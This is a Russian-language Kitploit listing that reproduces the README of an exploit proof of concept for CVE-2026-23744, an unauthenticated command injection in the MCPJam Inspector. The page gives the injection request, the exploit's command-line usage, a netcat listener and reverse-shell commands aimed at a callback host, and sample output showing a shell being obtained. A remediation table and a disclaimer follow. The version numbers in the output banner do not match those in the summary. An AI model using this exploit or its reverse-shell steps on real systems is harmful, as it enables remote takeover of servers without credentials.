Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
mcp-pwn — Эксплойт PoC для CVE-2026-23744 — неаутентифицированное RCE в MCPJam Inspector через невалидированную инъекцию команды serverConfig на /api/mcp/connect, позволяющее получить reverse shell от имени владельца процесса без учетных данных. | Kitploit
Инструменты/GitHubGitHub/jf-gondim/mcp-pwn
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming
GitHubjf-gondim/mcp-pwn

mcp-pwn

Эксплойт PoC для CVE-2026-23744 — неаутентифицированное RCE в MCPJam Inspector через невалидированную инъекцию команды serverConfig на /api/mcp/connect, позволяющее получить reverse shell от имени владельца процесса без учетных данных.

Репозиторий
373 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-23744 — MCPJam: неавторизованное удаленное выполнение кода

Сводка

MCPJam — это инспектор и прокси с открытым исходным кодом для MCP (Model Context Protocol), используемый для подключения, отладки и управления MCP-серверами. Версии <= 1.4.2 expose endpoint /api/mcp/connect без аутентификации или проверки ввода. Неавторизованный удаленный злоумышленник может внедрить произвольные команды ОС через поля serverConfig.command / serverConfig.args, получив возможность удаленного выполнения кода с привилегиями владельца процесса.


Детали уязвимости

ПолеЗначение
CVE IDCVE-2026-23744
CVSS Score9.8 (Critical)
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 — Некорректная нейтрализация специальных элементов в команде ОС
КомпонентMCPJam MCP Proxy Inspector
Затрагиваемые версииMCPJam <= 1.4.2
Исправлено вMCPJam >= 1.4.3
Вектор атакиСеть — аутентификация не требуется
Дата раскрытия2026-01-15

Технический анализ

Уязвимый endpoint принимает неавторизованный JSON-запрос POST:

root@kitploit:~
POST /api/mcp/connect HTTP/1.1
Host: <target>:3000
Content-Type: application/json

{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<ATTACKER_CONTROLLED>"],
    "env": {}
  },
  "serverId": "any_string"
}

MCPJam передает command и args напрямую в spawner процессов Node.js (child_process.spawn или эквивалент) без:

  • Проверки ввода или разрешенного списка команд
  • Применения аутентификации или авторизации к этому endpoint
  • Песочницы, изоляции пространства имен или понижения привилегий

Злоумышленник, имеющий доступ к порту 3000 (по умолчанию), может передать полезную нагрузку reverse-shell в args[1], получив shell от имени владельца процесса MCPJam — часто это root или сервисная учетная запись с широким доступом к системе.

Основная причина

Отсутствие промежуточного программного обеспечения аутентификации на /api/mcp/connect в сочетании с неконтролируемым использованием предоставленных пользователем значений в вызове spawn процесса создает классическую неавторизованную инъекцию команд ОС (CWE-78).


Использование эксплойта

Требования

root@kitploit:~
pip install requests urllib3

Аргументы

root@kitploit:~
  -t, --target          IP-адрес или имя хоста цели
  -p, --port            Порт цели (по умолчанию MCPJam: 3000)
  -l, --lhost           Локальный IP для обратного вызова reverse-shell
  -r, --lport           Локальный порт для обратного вызова reverse-shell
      --timeout         Время ожидания доступности цели в секундах (по умолчанию: 30)
      --shell-timeout   Таймаут POST перед предположением о сбросе shell (по умолчанию: 5)
  -v, --verbose         Выводить полное тело HTTP-ответа

Пошаговое выполнение

1. Запустите netcat-слушатель на своей машине:

root@kitploit:~
nc -lvnp 4444

2. Запустите эксплойт:

root@kitploit:~
# Базовый
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 4444

# Подробный вывод + увеличенный таймаут доступности (для медленных целей)
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 4444 --timeout 60 -v

# Более длинный таймаут shell (больше времени перед предположением, что shell установлен)
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 9001 --shell-timeout 10

Ожидаемый вывод

root@kitploit:~
 ╔═══════════════════════════════════════════════════════════════════╗
 ║     MCPJam  ·  Unauthenticated RCE via serverConfig Injection     ║
 ║                        CVE-2026-23744                             ║
 ╚═══════════════════════════════════════════════════════════════════╝
  CVE ID      :  CVE-2026-23744
  Component   :  MCPJam MCP Proxy Inspector
  Affected    :  <= 1.2.3   →  Patched: >= 1.2.4
  CVSS Score  :  9.8 (Critical)
  CVSS Vector :  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  CWE         :  CWE-78 — OS Command Injection
  Type        :  Unauthenticated Remote Code Execution  (Network / No Auth)
  Reference   :  https://nvd.nist.gov/vuln/detail/CVE-2026-23744

  10:32:01 [*] Probing target 10.10.11.50:3000  (max 30s) ...
  10:32:02 [+] Target is alive — HTTP 200

  10:32:02 [*] Exploit endpoint  : http://10.10.11.50:3000/api/mcp/connect
  10:32:02 [*] Reverse-shell CB  : 10.10.14.5:4444
  10:32:02 [!] Ensure listener   : nc -lvnp 4444
  10:32:02 [*] Firing payload    ...

  10:32:07 [+] POST timed out after 5s — reverse shell likely established on 10.10.14.5:4444
  10:32:07 [+] Switch to your netcat listener — incoming connection expected.

  10:32:07 [+] Exploit routine complete.

Таймаут = индикатор успеха. Когда POST-запрос истекает по тайм-ауту, целевой процесс блокируется на открытом reverse-shell — это ожидаемое поведение, подтверждающее достижение RCE. Немедленно переключитесь на свой слушатель.


Устранение уязвимости

ПриоритетДействие
КритическийОбновите MCPJam до >= 1.4.3
ВысокийОграничьте доступ к /api/mcp/connect с помощью промежуточного ПО аутентификации
ВысокийПримените правило брандмауэра на уровне сети, ограничивающее доступ к порту MCPJam доверенными IP
СреднийВнедрите разрешенный список допустимых значений для serverConfig.command
СреднийЗапускайте MCPJam внутри контейнера / с ограниченным пользователем Linux (без shell, без /dev/tcp)
НизкийВключите аудит событий создания процессов

Ссылки

  • CVE-2026-23744: REC in MCPJam inspector due to HTTP Endpoint exposes
  • NVD — CVE-2026-23744
  • CWE-78: OS Command Injection
  • OWASP: Command Injection
  • OWASP Top 10: A03 Injection
  • Model Context Protocol — Security Considerations
  • MCPJam Project

Отказ от ответственности

Данный эксплойт предоставлен исключительно в образовательных целях и для авторизованного тестирования безопасности. Используйте только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение. Несанкционированное использование является незаконным и неэтичным.

Скачать инструмент